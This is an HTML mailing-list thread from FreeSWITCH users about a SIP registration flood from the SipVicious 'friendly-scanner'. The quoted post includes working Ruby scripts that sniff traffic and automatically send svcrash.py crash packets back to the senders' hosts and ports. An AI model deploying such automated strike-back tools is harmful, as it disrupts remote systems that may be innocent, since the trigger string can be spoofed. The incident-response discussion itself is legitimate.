That would work until attacker defines a custom user-agent string. There has been reports of modified SipVicious code using Asterisk PBX as the agent.<br><br><div class="gmail_quote">On Thu, Apr 21, 2011 at 4:13 AM, Denis Galvao <span dir="ltr"><<a href="mailto:denisgalvao@gmail.com">denisgalvao@gmail.com</a>></span> wrote:<br>
<blockquote class="gmail_quote" style="margin: 0pt 0pt 0pt 0.8ex; border-left: 1px solid rgb(204, 204, 204); padding-left: 1ex;">Nice! Thanks for sharing!<br>
<br>
Denis<br>
<br>
2011/4/20, Peter P GMX <<a href="mailto:Prometheus001@gmx.net">Prometheus001@gmx.net</a>>:<br>
<div><div></div><div class="h5">> Hello all,<br>
><br>
> I would like to share this with you as you may have also been affected<br>
> by this threat.<br>
><br>
> Yesterday we received a SPIT attack to our Freeswitch servers. We had<br>
> about 50 register requests/sec. We noticed this as we saw a slight<br>
> increase in the load of the Freeswitch servers. Fortunately Freeswitch<br>
> can handle a huge amount of register requests so we had no denial of<br>
> service.<br>
><br>
> You can identify this attack by finding the following in the Register<br>
> message:<br>
> User-Agent: friendly-scanner<br>
><br>
> How to get rid of it:<br>
> The attacker used Sipvicious (friendly-scanner). Sipvicious itself has a<br>
> nice tool "svcrash.py" wich can send a malformed packet back to the<br>
> attacker which crashes their own Sipvicious tool. You can issue this tool by<br>
> python svcrash.py -d <host of attacker> -p <port of attacker><br>
> You will need port 5060 on your machine to work. But there is also a<br>
> workaround for that. svcrash.py will show how to overcome this if your<br>
> port 5060 is not available.<br>
> Download it here<br>
> <a href="http://sipvicious.googlecode.com/files/sipvicious-0.2.6.tar.gz" target="_blank">http://sipvicious.googlecode.com/files/sipvicious-0.2.6.tar.gz</a> and<br>
> unpack it to a folder of your choice.<br>
><br>
> I wrote a small Ruby script to send the packet back to a port range, as<br>
> our attacker used some dozens of ports to send.<br>
> Here is the script (Install ruby first by "apt-get install ruby" e.g. on<br>
> Debian based systems). Put it into the sipvicious directory<br>
> kill_ports.rb:<br>
><br>
> #!/usr/bin/env ruby<br>
> host=ARGV[0]<br>
> start_port=ARGV[1].to_i<br>
> end_port=ARGV[2].to_i<br>
> start_port.upto(end_port) do |port|<br>
> cmd="python svcrash.py -d #{host} -p #{port}"<br>
> p cmd<br>
> erg=`#{cmd}`<br>
> p erg<br>
> end<br>
><br>
> You now can run it by<br>
> ./kill_ports.rb <ip> <from_port> <to_port><br>
><br>
> By using this tool we got rid of most of the SPIT messages. But after a<br>
> while they started again to attack us from different ports.<br>
><br>
> The next step is: Why not automate this by trying to identify host and<br>
> port automatically and send back the svcrash.py packet to the sender's port?<br>
><br>
> First install the pcap library<br>
> apt-get install libpcap-dev libpcap-ruby<br>
><br>
> Then I wrote the following tool to automate this, it makes use of the<br>
> kill_ports.rb above:<br>
> strike_back.rb:<br>
><br>
> #!/usr/bin/env ruby<br>
> # I used some code from <a href="http://snippets.dzone.com/posts/show/5931" target="_blank">http://snippets.dzone.com/posts/show/5931</a><br>
> require 'pcaplet'<br>
> require 'logger'<br>
> require 'timeout'<br>
> @timeout=3600 # max runtime: 1 hour<br>
><br>
> @logfile='strike_back.log'<br>
> class AuditLogger < Logger<br>
> def format_message(severity, timestamp, progname, msg)<br>
> puts msg<br>
> "#{msg}\n"<br>
> end<br>
> end<br>
><br>
> logfile = File.open(@logfile, 'a')<br>
> LOGGER = AuditLogger.new(logfile)<br>
> LOGGER.level = Logger::INFO<br>
> search="friendly-scanner"<br>
> puts"Searching for '#{ search}' in SIP packets"<br>
> $network = Pcaplet.new('-s 1500')<br>
> $filter = Pcap::Filter.new('udp and dst port 5060', $network.capture)<br>
> $network.add_filter($filter)<br>
> puts "Logfile: #{@logfile}"<br>
> puts "Starting capture..."<br>
> begin<br>
> Timeout.timeout(@timeout) do # 3600 sec<br>
> for p in $network<br>
> header= "#{Time.now.strftime("%Y-%m-%d %H:%M:%S")}<br>
> #{p.src}:#{p.sport} => #{p.dst}:#{p.dport}"<br>
> if $filter =~ p<br>
> #puts "simple search"<br>
> if p.udp_data.index(search)<br>
> LOGGER.info "Kill Friendly scanner #{p.src} with Source<br>
> Port #{p.sport}"<br>
> cmd="./kill_ports.rb #{p.src} #{p.sport} #{p.sport}"<br>
> erg=`#{cmd}`<br>
> p erg<br>
> LOGGER.info header<br>
> LOGGER.info p.udp_data<br>
> end<br>
> end<br>
> end<br>
> end<br>
> rescue Timeout::Error<br>
> logfile.flush<br>
> puts "Timeout - finished."<br>
> end<br>
><br>
> There may be a better way to code this, but at least it worked. After<br>
> about 15min the number of attacks went to 0.<br>
><br>
> Disclaimer: You can damage other systems by using these tools. So be<br>
> carefull and use at your own risks. Do not use this tool for attacking<br>
> other systems!<br>
><br>
> Best regards<br>
> Peter<br>
><br>
> _______________________________________________<br>
> FreeSWITCH-users mailing list<br>
> <a href="mailto:FreeSWITCH-users@lists.freeswitch.org">FreeSWITCH-users@lists.freeswitch.org</a><br>
> <a href="http://lists.freeswitch.org/mailman/listinfo/freeswitch-users" target="_blank">http://lists.freeswitch.org/mailman/listinfo/freeswitch-users</a><br>
> UNSUBSCRIBE:<a href="http://lists.freeswitch.org/mailman/options/freeswitch-users" target="_blank">http://lists.freeswitch.org/mailman/options/freeswitch-users</a><br>
> <a href="http://www.freeswitch.org" target="_blank">http://www.freeswitch.org</a><br>
><br>
<br>
</div></div><font color="#888888">--<br>
Enviado do meu celular<br>
</font><div><div></div><div class="h5"><br>
_______________________________________________<br>
FreeSWITCH-users mailing list<br>
<a href="mailto:FreeSWITCH-users@lists.freeswitch.org">FreeSWITCH-users@lists.freeswitch.org</a><br>
<a href="http://lists.freeswitch.org/mailman/listinfo/freeswitch-users" target="_blank">http://lists.freeswitch.org/mailman/listinfo/freeswitch-users</a><br>
UNSUBSCRIBE:<a href="http://lists.freeswitch.org/mailman/options/freeswitch-users" target="_blank">http://lists.freeswitch.org/mailman/options/freeswitch-users</a><br>
<a href="http://www.freeswitch.org" target="_blank">http://www.freeswitch.org</a><br>
</div></div></blockquote></div><br><br clear="all"><br>-- <br>Kerem Erciyes - Sistem Danismani<br><a href="http://keremerciyes.com" target="_blank">http://keremerciyes.com</a><br><br><br>